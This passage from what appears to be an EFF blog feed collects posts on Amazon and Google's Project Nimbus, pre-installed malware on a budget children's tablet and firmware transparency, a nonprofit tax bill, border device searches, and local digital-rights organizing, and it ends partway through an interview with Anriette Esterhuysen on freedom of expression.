systematic oppression of journalists, healthcare workers, aid workers, and ordinary families.\u00a0\nTransparency is not a luxury when human rights are at risk\u2014it\u2019s an ethical and legal obligation.\nThe consequences are serious. Vulnerable communities in Gaza and the West Bank suffer violations of their human rights, including their rights to privacy, freedom of movement, and free association, all of which can be fostered and furthered by pervasive surveillance. These documented violations underscore the ethical responsibility of Amazon and Google, whose technologies are at the heart of this surveillance scheme.\u00a0\nAmazon and Google\u2019s Promises\nAmazon and Google have made public commitments to align with the UN Guiding Principles on Business and Human Rights and their own AI ethics frameworks. These frameworks are supposed to ensure that their technologies do not contribute to harm. But their silence on these pressing concerns speaks volumes, undermining trust in their supposed dedication to these principles and casting doubt on their sincerity.\nUnanswered Letters, Unanswered Accountability\nWhen we sent letters to Amazon and Google, it was with direct, actionable questions about their involvement in Project Nimbus. We asked for transparency about their contracts, clients, and risk assessments. We called for evidence that due diligence had been conducted and demanded explanations of the steps taken to prevent their technologies from facilitating abuse.\nOur core demands were straightforward and tied directly to the company\u2019s commitments:\n\nDisclose the scope of their involvement in Project Nimbus.\nProvide evidence of risk assessments tied to this project.\nExplain how they are addressing credible reports of misuse.\n\nDespite these reasonable and urgent requests, which are tied directly to the companies\u2019 stated legal and ethical commitments, both companies have remained silent, and their silence isn\u2019t just an insufficient response\u2014it\u2019s an alarming one.\nWhy Transparency Cannot Wait\nTransparency is not a luxury when human rights are at risk\u2014it\u2019s an ethical and legal obligation. For both of these companies, it\u2019s an obligation they have promised to the rest of us. For global companies that wield immense power, silence in the face of abuse is inexcusable.\nThe Fight for Accountability\nEFF is making these letters public to highlight the human rights obligations Amazon and Google have undertaken and to raise reasonable questions they should answer in light of public reports about the misuse of their technologies in the Occupied Palestinian Territories. We aren\u2019t the first ones to raise concerns, but, having raised these questions\u00a0publicly, and now having given the companies a chance to clarify, we are increasingly concerned about their complicity.\u00a0\u00a0\u00a0\nGoogle and Amazon have promised all of us\u2014their customers and noncustomers alike\u2014that they would take steps to ensure that their technologies support a future where technology empowers rather than oppresses. It\u2019s increasingly clear that those promises are being ignored, if not entirely broken. EFF will continue to push for transparency and accountability.<\/p><\/div><\/li>
<\/span><\/a><\/div>One Down, Many to Go with Pre-Installed Malware on Android<\/a><\/span>
by Alexis Hancock<\/a> on November 27, 2024 at 10:56 pm <\/small>
Last year, we investigated a Dragon Touch children\u2019s tablet (KidzPad Y88X 10) and confirmed that it was linked to a string of fully compromised Android TV Boxes that also had multiple reports of malware, adware, and a sketchy firmware update channel. Since then, Google has taken the (now former) tablet distributor off of their list of Play Protect certified phones and tablets. The burden of catching this type of threat should not be placed on the consumer. Due diligence by manufacturers, distributors, and resellers is the only way to tackle this issue of pre-installed compromised devices making their way into the hands of unknowing customers. But in order to mitigate this issue, regulation and transparency need to be a part of the strategy.\u00a0\nAs of October, Dragon Touch is not selling any tablets on their website anymore. However, there is lingering inventory still out there in places like Amazon and Newegg. There are storefronts that exist only on reseller sites for better customer reach, but considering Dragon Touch also wiped their blog of any mention of their tablets, we assume a little more than a strategy shift happened here. \nWe wrote a guide to help parents set up their kid\u2019s Android devices safely, but it\u2019s difficult to choose which device to purchase to begin with. Advising people to simply buy a more expensive iPad or Amazon Fire Tablet doesn\u2019t change the fact people are going to purchase low-budget devices. Lower budget devices can be just as reputable if the ecosystem provided a path for better accountability. \nWho is Responsible?\nThere are some tools in development for consumer education, like the newly developed, voluntary Cyber Trust Mark by the FCC. This label would aim to inform consumers of the capabilities and guarantee that minimum security standards were met for an IoT device. However, the consumer holding the burden to check for pre-installed malware is absolutely ridiculous. Responsibility should fall to regulators, manufacturers, distributors, and resellers to check for this kind of threat. \nMore often than not, you can search for low budget Android devices on retailers like Amazon or Newegg, and find storefront pages with little transparency on who runs the store and whether or not they come from a reputable distributor. This is true for more than just Android devices, but considering how many products are created for and with the Android ecosystem, working on this problem could mean better security for thousands of products.\nYes, it is difficult to track hundreds to thousands of distributors and all of their products. It is hard to keep up with rapidly developing threats in the supply chain. You can\u2019t possibly know of every threat out there.\nWith all due respect to giant resellers, especially the multi-billion dollar ones: tough luck. This is what you inherit when you want to \u201csell everything.\u201d You also inherit the responsibility and risk of each market you encroach or supplant.\u00a0\nPossible Remedy: Firmware Transparency\nThankfully, there is hope on the horizon and tools exist to monitor compromised firmware.\nLast year, Google presented Android Binary Transparency in response to pre-installed malware. This would help track firmware that has been compromised with these two components:\n\nAn append-only log of firmware information that is immutable, globally observable, consistent, and auditable. Assured with cryptographic properties.\nA network of participants that invest in witnesses, log health, and standardization.\n\nGoogle is not the first to think of this concept. This is largely extracting lessons of success from Certificate Transparency. Yet, better support directly from the Android ecosystem for Android images would definitely help. This would provide an ecosystem of transparency of manufacturers and developers that utilize the Android Open Source Project (AOSP) to be just as respected as higher-priced brands. \nWe love open source here at EFF and would like to continue to see innovation and availability in devices that aren\u2019t necessarily created by bigger, more expensive names. But there needs to be an accountable ecosystem for these products so that pre-installed malware can be more easily detected and not land in consumer hands so easily. Right now you can verify your Pixel device if you have a little technical skill. We would like verification to be done by regulators and\/or distributors instead of asking consumers to crack out their command lines to verify themselves. \nIt would be ideal to see existing programs like Android Play Protect certified run a log like this with open-source log implementations, like Trillian. This way, security researchers, resellers, and regulating bodies could begin to monitor and query information on different Android Original Equipment Manufacturers (OEMs).\nThere are tools that exist to verify firmware, but right now this ecosystem is a wishlist of sorts. At EFF, we like to imagine what could be better. While a hosted comprehensive log of Android OEMs doesn\u2019t currently exist, the tools to create it do. Some early participants for accountability in the Android realm include F-Droid\u2019s Android SDK Transparency Log and the Guardian Project\u2019s (Tor) Binary Transparency Log. \nTime would be better spent on solving this problem systemically, than researching whether every new electronic evil rectangle or IoT device has malware or not.\nA complementary solution with binary transparency is the Software Bill of Materials (SBOMs). Think of this as a \u201clist of ingredients\u201d that make up software. This is another idea that is not very new, but has gathered more institutional and government support. The components listed in an SBOM could highlight issues or vulnerabilities that were reported for certain components of a software. Without binary transparency though, researchers, verifiers, auditors, etc. could still be left attempting to extract firmware from devices that haven\u2019t listed their images. If manufacturers readily provided these images, SBOMs can be generated more easily and help create a less opaque market of electronics. Low budget or not.\nWe are glad to see some movement from last year\u2019s investigations. Right in time for Black Friday. More can be done and we hope to see not only devices taken down more swiftly when reported, especially with shady components, but better support for proactive detection. Regardless of how much someone can spend, everyone deserves a safe, secure device that doesn\u2019t have malware crammed into it.<\/p><\/div><\/li>
<\/span><\/a><\/div>Tell the Senate: Don\u2019t Weaponize the Treasury Department Against Nonprofits<\/a><\/span>
by Jason Kelley<\/a> on November 27, 2024 at 7:04 pm <\/small>
Last week the House of Representatives passed a dangerous bill that would allow the Secretary of Treasury to strip a U.S. nonprofit of its tax-exempt status. If it passes the Senate and is signed into law, H.R. 9495 would give broad and easily abused new powers to the executive branch. Nonprofits would not have a meaningful opportunity to defend themselves, and could be targeted without disclosing the reasons or evidence for the decision.\u00a0\nThis bill is an existential threat to nonprofits of all stripes. Future administrations could weaponize the powers in this bill to target nonprofits on either end of the political spectrum. Even if they are not targeted, the threat alone could chill the activities of some nonprofit organizations.\nThe bill\u2019s authors have combined this attack on nonprofits, originally written as H.R. 6408, with other legislation that would prevent the IRS from imposing fines and penalties on hostages while they are held abroad. These are separate matters. Congress should separate these two bills to allow a meaningful vote on this dangerous expansion of executive power. No administration should be given this much power to target nonprofits without due process.\u00a0\ntell your senator\nProtect nonprofits\n\n\nOver 350 civil liberties, religious, reproductive health, immigrant rights, human rights, racial justice, LGBTQ+, environmental, and educational organizations signed a letter opposing the bill as written. Now, we need your help. Tell the Senate not to pass H.R. 9495, the so-called \u201cStop Terror-Financing and Tax Penalties on American Hostages Act.\u201d<\/p><\/div><\/li>
<\/span><\/a><\/div>EFF Tells the Second Circuit a Second Time That Electronic Device Searches at the Border Require a Warrant<\/a><\/span>
by Sophia Cope<\/a> on November 26, 2024 at 8:53 pm <\/small>
EFF, along with ACLU and the New York Civil Liberties Union, filed a second amicus brief in the U.S. Court of Appeals for the Second Circuit urging the court to require a warrant for border searches of electronic devices, an argument EFF has been making in the courts and Congress for nearly a decade.\nThe case, U.S. v. Smith, involved a traveler who was stopped at Newark airport after returning from a trip to Jamaica. He was detained by border officers at the behest of the FBI and his cell phone was forensically searched. He had been under investigation for his involvement in a conspiracy to control the New York area emergency mitigation services (\u201cEMS\u201d) industry, which included (among other things) insurance fraud and extortion. He was subsequently prosecuted and sought to have the evidence from his cell phone thrown out of court.\nAs we wrote about last year, the district court made history in holding that border searches of cell phones require a warrant and therefore warrantless device searches at the border violate the Fourth Amendment. However, the judge allowed the evidence to be used in Mr. Smith\u2019s prosecution because, the judge concluded, the officers had a \u201cgood faith\u201d belief that they were legally permitted to search his phone without a warrant.\nThe number of warrantless device searches at the border and the significant invasion of privacy they represent is only increasing. In Fiscal Year 2023, U.S. Customs and Border Protection (CBP) conducted 41,767 device searches.\nThe Supreme Court has recognized for a century a border search exception to the Fourth Amendment\u2019s warrant requirement, allowing not only warrantless but also often suspicionless \u201croutine\u201d searches of luggage, vehicles, and other items crossing the border.\nThe primary justification for the border search exception has been to find\u2014in the items being searched\u2014goods smuggled to avoid paying duties (i.e., taxes) and contraband such as drugs, weapons, and other prohibited items, thereby blocking their entry into the country.\nIn our brief, we argue that the U.S. Supreme Court\u2019s balancing test in Riley v. California (2014) should govern the analysis here\u2014and that the district court was correct in applying Riley. In that case, the Supreme Court weighed the government\u2019s interests in warrantless and suspicionless access to cell phone data following an arrest against an arrestee\u2019s privacy interests in the depth and breadth of personal information stored on a cell phone. The Supreme Court concluded that the search-incident-to-arrest warrant exception does not apply, and that police need to get a warrant to search an arrestee\u2019s phone.\nTravelers\u2019 privacy interests in their cell phones and laptops are, of course, the same as those considered in Riley. Modern devices, a decade later, contain even more data points that together reveal the most personal aspects of our lives, including political affiliations, religious beliefs and practices, sexual and romantic affinities, financial status, health conditions, and family and professional associations.\nIn considering the government\u2019s interests in warrantless access to digital data at the border, Riley requires analyzing how closely such searches hew to the original purpose of the warrant exception\u2014preventing the entry of prohibited goods themselves via the items being searched. We argue that the government\u2019s interests are weak in seeking unfettered access to travelers\u2019 electronic devices.\nFirst, physical contraband (like drugs) can\u2019t be found in digital data.\nSecond, digital contraband (such as child pornography) can\u2019t be prevented from entering the country through a warrantless search of a device at the border because it\u2019s likely, given the nature of cloud technology and how internet-connected devices work, that identical copies of the files are already in the country on servers accessible via the internet. As the Smith court stated, \u201cStopping the cell phone from entering the country would not \u2026 mean stopping the data contained on it from entering the country\u201d because any data that can be found on a cell phone\u2014even digital contraband\u2014\u201cvery likely does exist not just on the phone device itself, but also on faraway computer servers potentially located within the country.\u201d\nFinally, searching devices for evidence of contraband smuggling (for example, text messages revealing the logistics of an illegal import scheme) and other evidence for general law enforcement (i.e., investigating non-border-related domestic crimes, as was the case of the FBI investigating Mr. Smith\u2019s involvement in the EMS conspiracy) are too \u201cuntethered\u201d from the original purpose of the border search exception, which is to find prohibited items themselves and not evidence to support a criminal prosecution.\nIf the Second Circuit is not inclined to require a warrant for electronic device searches at the border, we also argue that such a search\u2014whether manual or forensic\u2014should be justified only by reasonable suspicion that the device contains digital contraband and be limited in scope to looking for digital contraband. This extends the Ninth Circuit\u2019s rule from U.S. v. Cano (2019) in which the court held that only forensic device searches at the border require reasonable suspicion that the device contains digital contraband, while manual searches may be conducted without suspicion. But the Cano court also held that all searches must be limited in scope to looking for digital contraband (for example, call logs are off limits because they can\u2019t contain digital contraband in the form of photos or files).\nIn our brief, we also highlighted two other district courts within the Second Circuit that required a warrant for border device searches: U.S. v. Sultanov (2024) and U.S. v. Fox (2024). We plan to file briefs in their appeals, as well. Earlier this month, we filed a brief in another Second Circuit border search case, U.S. v. Kamaldoss. We hope that the Second Circuit will rise to the occasion in one of these cases and be the first circuit to fully protect travelers\u2019 Fourth Amendment rights at the border.<\/p><\/div><\/li>
<\/span><\/a><\/div>Looking for the Answer to the Question, \"Do I Really Own the Digital Media I Paid For?\"<\/a><\/span>
by Christian Romero<\/a> on November 26, 2024 at 5:58 pm <\/small>
Sure, buying your favorite video game, movie, or album online is super convenient. I personally love being able to pre-order a game and play it the night of release, without needing to go to a store.\u00a0\nBut something you may not have thought about before making your purchase are the differences between owning a physical or digital copy of that media. Unfortunately, there\u2019s quite a few rights you give up by purchasing a digital copy of your favorite game, movie, or album! On our new site, Digital Rights Bytes, we outline the differences between owning physical and digital media, and why we need to break down that barrier.\u00a0\nDigital Rights Bytes explains this and answers other common questions about technology that may be getting on your nerves and includes short videos featuring adorable animals. You can also read up on what EFF is doing to ensure you actually own the digital media you pay for, and how you can take action, too.\u00a0\nGot other questions you\u2019d like us to answer in the future? Let us know on your favorite social platform using the hashtag #DigitalRightsBytes.\u00a0<\/p><\/div><\/li>
<\/span><\/a><\/div>Organizing for Digital Rights in the Pacific Northwest<\/a><\/span>
by Christopher Vines<\/a> on November 22, 2024 at 12:19 am <\/small>
Recently I traveled to Portland, Oregon to speak at the PDX People\u2019s Digital Safety Fair, meet up with five groups in the Electronic Frontier Alliance, and attend BSides PDX 2024. Portland\u2019s first ever Digital Safety Fair was a success and five of our six EFA organizations in the area participated: Personal Telco Project, Encode Justice Oregon, PDX Privacy, TA3M Portland, and Community Broadband PDX. I was able to reaffirm our support with these organizations, and table with most of them as they met local people interested in digital rights. We distributed EFF toolkits as a resource, and we made sure EFA brochures and stickers had a presence on all their tables. A few of these organizations were also present at BSides PDX, and it was great seeing them being leaders in the local infosec and cybersecurity community.\nPDX Privacy\u2019s mission is to bring about transparency and control in the acquisition and use of surveillance systems in the Portland Metro area, whether personal data is captured by the government or by commercial entities. Transparency is essential to ensure privacy protections, community control, fairness, and respect for civil rights. \nTA3M Portland is an informal meetup designed to connect software creators and activists who are interested in censorship, surveillance, and open technology. \nThe Oregon Chapter of Encode Justice, the world\u2019s first and largest youth movement for human-centered artificial intelligence, works to mobilize policymakers and the public for guardrails to ensure AI fulfills its transformative potential. Its mission is to ensure we encode justice and safety into the technologies we build.\n\n\n(l to r) Pictured here with the PDXPrivacy\u2019s Seth, Boaz and new President, Nate. Pictured with Chris Bushick, legendary Portland privacy advocate of TA3M PDX. Pictured with the leaders of Encode Justice Oregon.\nThere's growing momentum in the Seattle and Portland areas\nCommunity Broadband PDX\u2019s focus is on expanding the existing dark fiber broadband network in Portland to all residents, creating an open-source model where the city owns the fiber, and it\u2019s controlled by local nonprofits and cooperatives, not large ISP\u2019s. \nPersonal Telco is dedicated to the idea that users have a central role in how their communications networks are operated. This is done by building our own networks that we share with our communities, and by helping to educate others in how they can, too.\nAt the People\u2019s Digital Safety Fair I spoke in the main room on the campaign to bring high-speed broadband to Portland, which is led by Community Broadband PDX and the Personal TelCo Project. I made a direct call to action for those in attendance to join the campaign. My talk culminated with, \u201cWhat kind of ACTivist would I be if I didn\u2019t implore you to take an ACTion? Everybody pull out your phones.\u201d Then I guided the room to the website for Community Broadband PDX and to the \u2018Join Us\u2019 page where people in that moment signed up to join the campaign, spread the word with their neighbors, and get organized by the Community Broadband PDX team. You can reach out to them at cbbpdx.org and personaltelco.net. You can get in touch with all the groups mentioned in this blog with their hyperlinks above, or use our EFA allies directory to see who\u2019s organizing in your area.\u00a0\n\n\n\n(l to r) BSidesPDX 2024 swag and stickers. A photo of me speaking at the People\u2019s Digital Privacy Fair on broadband access in PDX. Pictured with Jennifer Redman, President of Community Broadband PDX and former broadband administrator for the city of Portland, OR. A picture of the Personal TelCo table with EFF toolkits printed and EFA brochures on hand. Pictured with Ted, Russell Senior, and Drew of Personal Telco Project. Lastly, it's always great to see a member and active supporter of EFF interacting with one of our EFA groups.\nIt\u2019s very exciting to see what members of the EFA are doing in Portland! I also went up to Seattle and met with a few organizations, including one now in talks to join the EFA. With new EFA friends in Seattle, and existing EFA relationships fortified, I'm excited to help grow our presence and support in the Pacific Northwest, and have new allies with experience in legislative engagement. It\u2019s great to see groups in the Pacific Northwest engaged and expanding their advocacy efforts, and even greater to stand by them as they do!\nElectronic Frontier Alliance members get support from a community of like-minded grassroots organizers from across the US. If your group defends our digital rights, consider joining today. https:\/\/efa.eff.org<\/p><\/div><\/li>
<\/span><\/a><\/div>Speaking Freely: Anriette Esterhuysen<\/a><\/span>
by David Greene<\/a> on November 21, 2024 at 11:58 pm <\/small>
This interview took place in April 2024 at NetMundial+10 in S\u00e3o Paulo, Brazil. This interview has been edited for length and clarity.\u00a0\nAnriette Esterhuysen is a human rights defender and computer networking trailblazer from South Africa. She has pioneered the use of Internet and Communications Technologies (ICTs) to promote social justice in South Africa and throughout the world, focusing on affordable Internet access. She was the executive director of Association for Progressive Communications from 2007 to 2017.\u00a0 In November 2019 Anriette was appointed by the Secretary-General of the United Nations to chair the Internet Governance Forum\u2019s Multistakeholder Advisory Group.\u00a0\nGreene: Can you go ahead and introduce yourself for us? \nEsterhuysen: My name is Anriette Esterhuysen, I am from South Africa and I\u2019m currently sitting here with David in Sao Paulo, Brazil. My closest association remains with the Association for Progressive Communications where I was executive director from 2000 to 2017.\u00a0 I continue to work for APC as a consultant in the capacity of Senior Advisor on Internet Governance and convenor of the annual African School on Internet Governance (AfriSIG).\nGreene: Can you tell us more about the African School on Internet Governance (AfriSIG)? \nAfriSIG is fabulous. It differs from internet governance capacity building provided by the technical community in that it aims to build critical thinking. It also does not gloss over the complex power dynamics that are inherent to multistakeholder internet governance. It tries to give participants a hands-on experience of how different interest groups and sectors approach internet governance issues. \nAfriSIG started as a result of Titi Akinsanmi,\u00a0 a young Nigerian doing postgraduate studies in South Africa, approaching APC and saying, \u201cLook, you\u2019ve got to do something. There\u2019s a European School of Internet Governance, there\u2019s one in Latin America, and where is there more need for capacity-building than in Africa?\u201d She convinced me and my colleague Emilar Vushe Gandhi, APC Africa Policy Coordinator at the time, to organize an African internet governance school in 2013 and since then it has taken place every year. It has evolved over time into a partnership between APC and the African Union Commission and Research ICT Africa. \nIt is a residential leadership development and learning event that takes place over 5 days. We bring together people who are already working in internet or communications policy in some capacity. We create space for conversation between people from government, civil society, parliaments, regulators, the media, business and the technical community on what in Africa are often referred to as \u201csensitive topics\u201d. This can be anything from LGBTQ rights to online freedom of expression, corruption, authoritarianism, and accountable governance. We try to create a safe space for deep diving the reasons for the dividing lines between, for example, government and civil society in Africa. It\u2019s very delicate. I love doing it because I feel that it transforms people\u2019s thinking and the way they see one another and one another\u2019s roles. At the end of the process, it is common for a government official to say they now understand better why civil society demands media freedom, and how transparency can be useful in protecting the interests of public servants. And civil society activists have a better understanding of the constraints that state officials face in their day-to-day work. It can be quite a revelation for individuals from civil society to be confronted with the fact that in many respects they have greater freedom to act and speak than civil servants do. \nGreene: That\u2019s great. Okay now tell me, what does free speech mean to you? \nI think of it as freedom of expression. It\u2019s fundamental. I grew up under Apartheid in South Africa and was active in the struggle for democracy. There is something deeply wrong with being surrounded by injustice, cruelty and brutality and not being allowed to speak about it. Even more so when one's own privilege comes at the expense of the oppressed, as was the case for white South Africans like myself. For me, freedom of expression is the most profound part of being human. You cannot change anything, deconstruct it, or learn about it at a human level without the ability to speak freely about what it is that you see, or want to understand. The absence of freedom of expression entrenches misinformation, a lack of understanding of what is happening around you. It facilitates willful stupidity and selective knowledge. That\u2019s why it\u2019s so smart of repressive regimes to stifle freedom of expression. By stifling free speech you disempower the victims of injustice from voicing their reality, on the one hand, and, on the other, you entrench the unwillingness of those who are complicit with the injustice to confront that they\u2019re part of it. \nIt is impossible to shift a state of repression and injustice without speaking out about it. That is why people who struggle for freedom and justice speak about it, even if doing so gets them imprisoned, assassinated or executed. Change starts through people, the media, communities, families, social movements, and unions, speaking about what needs to change.\u00a0 \nGreene: Having grown up in Apartheid, is there a single personal experience or a group of personal experiences that really shaped your views on freedom of expression?\nI think I was fortunate in the sense that I grew up with a mother who\u2014based on her Christian beliefs\u2014came to see Apartheid as being wrong. She was working as a social worker for the main state church\u2014the Dutch Reformed Church (DRC) \u2014at the time of the Cottesloe Consultation convened in Johannesburg by the World Council of Churches (WCC) shortly after the Sharpeville Massacre.\u00a0 An outcome statement from this consultation, and later deliberations by the WCC in Geneva, condemned the DRC for its racism. In response the DRC decided to leave the WCC.\u00a0 At a church meeting my mother attended she listened to the debate and someone in the church hierarchy who spoke against this decision and challenged the church for its racist stance. His words made sense to her. She spoke to him after the meeting and soon joined the organization he had started to oppose Apartheid, the Christian Institute. His name was Beyers Naud\u00e9 and he became an icon of the anti-Apartheid struggle and an enemy of the apartheid state. Apparently, my first protest march was in a pushchair at a rally in 1961 to oppose the rightwing National Party government's decision for South Africa to leave the Commonwealth. \nThere\u2019s no single moment that shaped my view of freedom of expression. The thing about living in the context of that kind of racial segregation and repression is that you see it every day. It\u2019s everywhere around you, but like Nazi Germany, people\u2014white South Africans\u2014chose not to see it, or if they did, to find ways of rationalizing it. \nCensorship was both a consequence of and a building block of the Apartheid system. There was no real freedom of expression. But because we had courageous journalists, and a broad-based political movement\u2014above ground and underground\u2014that opposed the regime, there were spaces where one could speak\/listen\/learn.\u00a0 The Congress of Democrats established in the 1950s after the Communist Party was banned was a social justice movement in which people of different faiths and political ideologies (Jewish, Christian and Muslim South Africans alongside agnostics and communists) fought for justice together. Later in the 1980s, when I was a student, this broad front approach was revived through the United Democratic Front. Journalists did amazing things. When censorship was at its height during the State of Emergency in the 1980s, newspapers would go to print with columns of blacked-out text\u2014their way of telling the world that they were being censored.\n\n\n mediacensorshipexample.png\n \n \n \n \n\n \n\n\nI used to type up copy filed over the phone or cassettes by reporters for the Weekly Mail when I was a student. We had to be fast because everything had to be checked by the paper\u2019s lawyers before going to print. Lack of freedom of expression was legislated. The courage of editors and individual journalists to defy this, and if they could not, to make it obvious made a huge impact on me.\nGreene: Is there a time when you, looking back, would consider that you were personally censored?\u00a0\nI was very much personally censored at school. I went to an Afrikaans secondary school. And I kind of have a memory of when, after going back after a vacation, my math teacher\u2014who I had no personal relationship with \u2014walked past me in class and asked me how my holiday on Robben Island was. I thought, why is he asking me that? A few days later I heard from a teacher I was friendly with that there was a special staff meeting about me. They felt I was very politically outspoken in class and the school hierarchy needed to take action. No actual action was taken... but I felt watched, and through that, censored, even if not silenced.\nI felt that because for me, being white, it was easier to speak out than for black South Africans, it would be wrong not to do so. As a teenager, I had already made that choice. It was painful from a social point of view because I was very isolated, I didn\u2019t have many friends, I saw the world so differently from my peers. In 1976 when the Soweto riots broke out I remember someone in my class saying, \u201cThis is exactly what we\u2019ve been waiting for because now we can just kill them all.\u201d\u00a0 This is probably also why I feel a deep connection with Israel\/Palestine. There are many dimensions to the Apartheid analogy. The one that stands out for me is how, as was the case in South Africa too, those with power\u2014Jewish Israelis\u2014dehumanize and villainize the oppressed - Palestinians.\nGreene: At some point did you decide that you want human rights more broadly and freedom of expression to be a part of your career? \nI don\u2019t think it was a conscious decision. I think it was what I was living for. It was the raison d\u2019etre of my life for a long time. After high school, I had secured places at two universities. At one for a science degree and at the other for a degree in journalism. But I ended up going to a different university making the choice based on the strength of its student movement. The struggle against Apartheid was expressed and conceptualized as a struggle for human rights. The Constitution of democratic South Africa was crafted by human rights lawyers and in many respects it is a localized interpretation of the Universal Declaration.\nLater, in the late 1980s,\u00a0 when I started working on access to information through the use of Information and Communication Technologies (ICTS) it felt like an extension of the political work I had done as a student and in my early working life. APC, which I joined as a member\u2014not staff\u2014in the 1990s, was made up of people from other parts of the world who had been fighting their own struggles for freedom\u2014Latin America, Asia, and Central\/ Eastern Europe. All with very similar hopes about how the use of these technologies can enable freedom and solidarity.\nGreene: So fast forward to now, currently do you think the platforms promote freedom of expression for people or restrict freedom of expression?\nNot a simple question. Still, I think the net effect is more freedom of expression. The extent of online freedom of expression is uneven and it\u2019s distorted by the platforms in some contexts. Just look at the biased pro-Israel way in which several platforms moderate content. Enabling hate speech in contexts of conflict can definitely have a silencing effect. By not restricting hate in a consistent manner, they end up restricting freedom of expression.\u00a0 But I think it\u2019s disingenuous to say that overall the internet does not increase freedom of expression. And social media platforms, despite their problematic business models, do contribute. They could of course do it so much better, fairly and consistently, and for not doing that they need to be held accountable.\u00a0\nGreene: We can talk about some of the problems and difficulties. Let\u2019s start with hate speech. You said it\u2019s a problem we have to tackle. How do we tackle it?\u00a0\nYou\u2019re talking to a very cynical old person here. I think that social media amplifies hate speech. But I don\u2019t think they create the impulse to hate. Social media business models are extractive and exploitative. But we can\u2019t fix our societies by fixing social media. I think that we have to deal with hate in the offline world. Channeling energy and resources into trying to grow tolerance and respect for human rights in the online space is not enough. It\u2019s just dealing with the symptoms of intolerance and populism. We need to work far harder to hold people, particularly those with power, accountable for encouraging hate (and disinformation). Why is it easy to get away with online hate in India? Because Modi likes hate. It\u2019s convenient for him, it keeps him in political power. Trump is another example of a leader that thrives on hate.\u00a0\nWhat\u2019s so problematic about social media platforms is the monetization of this. That is absolutely wrong and should be stopped\u2014I can say all kinds of things about it. We need to have a multi-pronged approach. We need market regulation, perhaps some form of content regulation, and new ways of regulating advertising online. We need access to data on what happens inside these platforms. Intervention is needed, but I do not believe that content control is the right way to do it.\u00a0 It is the business model that is at the root of the problem. That\u2019s why I get so frustrated with this huge global effort by governments (and others)\u00a0 to ensure information integrity through content regulation. I would rather they spend the money on strengthening independent media and journalism.\nGreene: We should note we are currently at an information integrity conference today. In terms of hate speech, are there hazards to having hate speech laws?\u00a0\nSouth Africa has hate speech laws which I believe are necessary. Racial hate speech continues to be a problem in South Africa. So is xenophobic hate speech. We have an election coming on May 29 [2024] and I was listening to talk radio on election issues and hearing how political parties use xenophobic tropes in their campaigns was terrifying. \u201cSouth Africa has to be for South Africans.\u201d \u201cNigerians run organized crime.\u201d\u00a0 \u201cAll drugs come from Mozambique,\u201d and so on. Dangerous speech needs to be called out.\u00a0 Norms are important. But I think that establishing legalized content regulation is risky. In contexts without robust protection for freedom of expression, such regulation can easily be abused by states to stifle political speech.\nGreene: Societal or legal norms?\nBoth.\u00a0 Legal norms are necessary because social norms can be so inconsistent, volatile. But social norms shape people\u2019s everyday experience and we have to strive to make them human rights aware. It is important to prevent the abuse of legal norms\u2014and states are, sadly, pretty good at doing just that. In the case of South Africa hate speech regulation works relatively well because there are strong protections for freedom of expression. There are soft and hard law mechanisms. The South African Human Rights Commission developed a social media charter to counter harmful speech online as a kind of self-regulatory tool. All of this works\u2014not perfectly of course\u2014because we have a constitution that is grounded in human rights. Where we need to be more consistent is in holding politicians accountable for speech that incites hate.\u00a0\nGreene: So do we want checks and balances built into the regulatory scheme or are you just wanting it existing within a government scheme that has checks and balances built in?\u00a0\nI don\u2019t think you need new global rule sets. I think the existing international human rights framework provides what we need and just needs to be strengthened and its application adapted to emerging tech. One of the reasons why I don\u2019t think we should be obsessive about restricting hate speech online is because it is a canary in a coal mine. In societies where there\u2019s a communal or religious conflict or racial hate,\u00a0 removing its manifestation online could be a missed opportunity to prevent explosions of violence offline.\u00a0 That is not to say that there should not be recourse and remedy for victims of hate speech online. Or that those who incite violence should not be held accountable. But I believe we need to keep the bar high in how we define hate speech\u2014basically as speech that incites violence.\u00a0\u00a0\nSouth Africa is an interesting case because we have very progressive laws when it comes to same-sex marriage, same-sex adoption, relationships, insurance, spousal recognition, medical insurance and so on, but there\u2019s still societal prejudice, particularly in poor communities.\u00a0 That is why we need a strong rights-oriented legal framework.\nGreene: So that would be another area where free speech can be restricted and not just from a legal sense but you think from a higher level principles sense.\u00a0\nRight. Perhaps what I am trying to say is that there is speech that incites violence and it should be restricted. And then there is speech that is hateful and discriminatory, and this should be countered, called out, and challenged, but not censored.\u00a0 When you\u2019re talking about the restriction\u2014or not even the restriction but the recognition and calling out of\u2014harmful speech it\u2019s important not just to do that online. In South Africa stopping xenophobic speech online or on public media platforms would be relatively simple. But it\u2019s not going to stop xenophobia in the streets.\u00a0 To do that we need other interventions. Education, public awareness campaigns, community building, and change in the underlying conditions in which hate thrives which in our case is primarily poverty and unemployment, lack of housing and security.\nGreene: This morning someone who spoke at this event was speaking about misinformation said, \u201cThe vast majority of misinformation is online.\u201d And certainly in the US, researchers say that\u2019s not true, most of it is on cable news, but it struck me that someone who is considered an expert should know better. We have information ecosystems and online does not exist separately.\u00a0\nIt\u2019s not separate. Agree. There\u2019s such a strong tendency to look at online spaces as an alternative universe. Even in countries with low internet penetration, there\u2019s a tendency to focus on the online components of these ecosystems. Another example would be child online protection. Most child abuse takes place in the physical world, and most child abusers are close family members, friends or teachers of their victims\u2014but there is a global obsession with protecting children online.\u00a0 It is a shortsighted and \u2018cheap\u2019 approach and it won\u2019t work. Not for dealing with misinformation or for protecting children from abuse.\nGreene: Okay, our last question we ask all of our guests. Who is your free speech hero?\u00a0\nDesmond Tutu. I have many free speech heroes but Bishop Tutu is a standout because he could be so charming about speaking his truths. He was fearless in challenging the Apartheid regime. But he would also challenge his fellow Christians.\u00a0 One of his best lines was, \u201cIf LGBT people are not welcome in heaven, I\u2019d rather go to the other place.\u201d\u00a0 And then the person I care about and fear for every day is Egyptian blogger Alaa Abd el-Fattah. I remember walking at night through the streets of Cairo with him in 2012. People kept coming up to him, talking to him, and being so obviously proud to be able to do so. His activism is fearless. But it is also personal, grounded in love for his city, his country, his family, and the people who live in it. For Alaa freedom of speech, and freedom in general, was not an abstract or a political goal. It was about freedom to love, to create art, music, literature and ideas in a shared way that brings people joy and togetherness.\nGreene: Well now I have a follow-up question. You said you think free speech is undervalued these days. In what ways and how do we see that?\u00a0\nWe see it manifested in the absence of tolerance, in the increase in people claiming that their freedoms are being violated by the expression of those they disagree with, or who criticize them. It\u2019s as if we\u2019re trying to establish these controlled environments where we don\u2019t have to listen to things that we think are wrong, or that we disagree with. As you said earlier, information ecosystems have offline and online components. Getting to the \u201ctruth\u201d requires a mix of different views, disagreement, fact-checking, and holding people who deliberately spread falsehoods accountable for doing so. We need people to have the right to free speech, and to counter-speech. We need research and evidence gathering, 